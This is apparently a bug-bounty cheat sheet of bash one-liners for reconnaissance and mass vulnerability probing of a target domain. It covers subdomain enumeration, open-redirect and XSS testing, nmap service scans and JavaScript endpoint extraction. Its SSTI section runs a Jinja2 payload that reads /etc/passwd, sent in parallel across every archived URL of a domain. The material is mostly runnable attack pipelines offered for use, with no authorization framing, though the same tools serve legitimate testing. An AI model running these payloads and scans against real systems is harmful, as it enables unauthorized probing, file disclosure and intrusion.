### Find open redirects

```bash
subfinder -d site.com -all -silent | waybackurls | sort -u | gf redirect | qsreplace 'https://example.com' | httpx -fr -title --match-string 'Example Domain'
```
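
The same pipeline, unrolled with per-stage comments (behavior unchanged; assumes subfinder, waybackurls, gf, qsreplace and httpx are on PATH and `site.com` is your target):

```bash
subfinder -d site.com -all -silent |                 # enumerate subdomains from all sources, no banner
  waybackurls |                                      # pull archived URLs for every subdomain
  sort -u |                                          # de-duplicate
  gf redirect |                                      # keep URLs whose parameters look redirect-prone
  qsreplace 'https://example.com' |                  # point every parameter value at a page you control
  httpx -fr -title --match-string 'Example Domain'   # -fr follows redirects; a matching title means the redirect fired
```
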
### Find SSTI at scale
```bash
echo "domain" | subfinder -silent | waybackurls | gf ssti | qsreplace "{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}" | parallel -j50 -q curl -g | grep "root:x"
```
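
The injected expression is the classic Python/Jinja2 object-walk payload (the `__subclasses__()[40]` index is environment-dependent); `curl -g` turns off URL globbing so the braces and brackets survive, and `parallel -q` keeps the payload quoted. A variant sketch, same tool assumptions, that also prints which URL leaked `/etc/passwd`:

```bash
echo "domain" | subfinder -silent | waybackurls | gf ssti |
  qsreplace "{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}" |
  parallel -j50 -q sh -c 'curl -sg "$0" | grep -q "root:x" && echo "SSTI: $0"'
```
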
### Scanning top exploited vulnerabilities according to CISA

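
One common way to sweep the CISA known-exploited vulnerabilities list is nuclei with its tagged templates; a minimal sketch, assuming nuclei and the public nuclei-templates are installed (the tag has been `cisa` in older template releases and `kev` in newer ones):

```bash
# feed live hosts into nuclei and run only the CISA/KEV-tagged templates
subfinder -d site.com -all -silent | httpx -silent | nuclei -tags cisa -severity critical,high -o cisa-hits.txt
```
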
### Subdomain bruteforcing with puredns

```bash
puredns bruteforce wordlist.txt site.com -r resolvers.txt -w output.txt
```

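
`wordlist.txt` and `resolvers.txt` are inputs you supply; puredns needs a trusted resolver list so it can filter wildcard and poisoned answers. A small follow-up sketch, assuming httpx is installed, to probe whatever the bruteforce finds:

```bash
# check which bruteforced subdomains actually serve HTTP(S)
cat output.txt | httpx -silent -status-code -title
```
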
### Finding Cross-Site Scripting (XSS) using KnoXSS API
```bash
echo "domain" | subfinder -silent | gauplus | grep "=" | uro | gf xss | awk '{ print "curl https://knoxss[.]me/api/v3 -d \"target="$1 "\" -H \"X-API-KEY: APIKNOXSS\""}' | sh
```
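
`APIKNOXSS` is a placeholder for your KnoXSS API key, and the domain is written defanged (`knoxss[.]me`), so restore the real dot before piping to `sh`. The awk stage only templates one curl call per candidate URL; the shape of that request for a single URL looks like the sketch below (the API path and header name are taken from the one-liner itself, the target value is a placeholder):

```bash
# one generated request: POST the candidate URL to the KnoXSS API with your key
curl https://knoxss.me/api/v3 \
  -d "target=https://site.com/page?q=1" \
  -H "X-API-KEY: APIKNOXSS"
```
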
### Clean list of host, port, and version
```bash
mkdir nmap; cat targets.txt | parallel -j 35 nmap {} -sTVC -host-timeout 15m -oN nmap/{} -p 22,80,443,8080 --open > /dev/null 2>&1; cd nmap; grep -Hari "/tcp" | tee -a ../services.txt; cd ../
```
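
The same one-liner unrolled with comments; behavior is unchanged:

```bash
mkdir nmap                                     # one nmap report per target lands here
cat targets.txt |
  parallel -j 35 nmap {} -sTVC -host-timeout 15m -oN nmap/{} -p 22,80,443,8080 --open > /dev/null 2>&1   # 35 scans in flight: connect scan, version detection, default scripts
cd nmap
grep -Hari "/tcp" | tee -a ../services.txt     # collect the "<host>:<port>/tcp open <service> <version>" lines
cd ../
```
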
### Waybackurls validator
```bash
waybackurls http://example.com | grep "url" | xargs -n 1 curl -s -o /dev/null -w "%{http_code} > %{url_effective}\n" | sort
```
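
The `-w "%{http_code} > %{url_effective}\n"` format prints `status > final_url` per request, so sorting groups dead and live endpoints; note that `grep "url"` only keeps lines literally containing the string `url`. An alternative sketch that lets httpx handle probing and concurrency (assuming httpx is installed):

```bash
# probe every archived URL, following redirects, and print status codes
waybackurls http://example.com | httpx -silent -fr -status-code
```
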
### Extract endpoints from JS (Part 1)
```bash
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
```
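
The pipeline has two halves: discover the `.js` files a page references, then fetch each one and grep out URL-looking strings and `.get/.post/.ajax/.load` endpoints. A sketch that factors the discovery half into a reusable function (the function name is hypothetical; the regexes are lifted from the one-liner above):

```bash
# hypothetical helper: list the .js files a page references (the discovery half of Parts 1-4)
extract_js_files() {
  curl -L -k -s "$1" | tac | sed "s#\\\/#\/#g" \
    | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" \
    | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu
}

extract_js_files https://www.example.com
```
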
### Extract endpoints from JS (Part 2)
```bash
curl -Lks https://example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=https://example.com '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
```
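
Part 2 hands each downloaded script to LinkFinder instead of grepping inline, so `linkfinder.py` must be invocable by that name. A hedged setup sketch (the repository URL is the well-known upstream; the requirements file and PATH trick are assumptions, adjust to your install):

```bash
# fetch LinkFinder and make `linkfinder.py -o cli -i <file>` resolvable, as the one-liner expects
git clone https://github.com/GerbenJavado/LinkFinder.git
cd LinkFinder && pip install -r requirements.txt
export PATH="$PWD:$PATH"    # assumes linkfinder.py is executable; otherwise invoke it via python3
```
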
### Extract endpoints from JS (Part 3)
```bash
curl -Lks https://example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=https://example.com '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\";curl -Lks \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d "'\""
```
### Extract endpoints from JS (Part 4)
```bash
curl -Lks https://example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=https://example.com '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d "'\""
```
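
Parts 1 through 4 all target a single origin; to sweep a whole scope, wrap the extractor in a loop over live hosts. A sketch, assuming a `live-hosts.txt` produced by something like `subfinder -d site.com -silent | httpx -silent`:

```bash
# list the .js files each live host references (the discovery stage above);
# swap the curl pipeline for any of Parts 1-4 to do full endpoint extraction
while read -r url; do
  echo "##### $url"
  curl -Lks "$url" | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*"
done < live-hosts.txt
```
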
## References
- [ReconOne](https://twitter.com/ReconOne_)
- [jdksec](https://twitter.com/jdksec/status/1236891532256575488)
- [atikqur007](https://twitter.com/atikqur007/status/1253235713023320064)
- [ofjaaah](https://twitter.com/ofjaaah/status/1532581839344394241)
- [pikpikcu](https://twitter.com/sec715/status/1295216521501908992)
- [gwen001](https://gist.github.com/gwen001/0b15714d964d99c740a7e8998bd483df)